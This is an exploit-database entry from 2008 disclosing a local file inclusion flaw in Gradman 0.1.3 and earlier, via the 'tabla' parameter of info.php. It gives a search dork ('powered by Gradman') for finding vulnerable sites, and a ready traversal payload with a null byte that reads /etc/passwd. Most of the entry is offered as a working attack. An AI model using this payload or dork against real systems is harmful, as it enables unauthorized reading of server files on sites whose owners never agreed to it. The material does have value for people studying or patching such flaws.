[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gradman <= 0.1.3 (info.php tabla) Local File Inclusion Vulnerability
# Published : 2008-01-18
# Author : Syndr0me
# Previous Title : Small Axe 0.3.1 (linkbar.php cfile) Remote File Inclusion Vulnerability
# Next Title : PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability
Software: Gradman <= 0.1.3
HomePage: http://gradman.xe1ido.com.mx/
Software: Gradman <= 0.1.3
Exploit: Local File Inclusion [High]
Dork: "powered by Gradman"
Bug Found By: Syndr0me! site: www.remoteexecution.es
Where: info.php?tabla=
Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r
[+] Exploit:
info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00
# www.Syue.com [2008-01-18]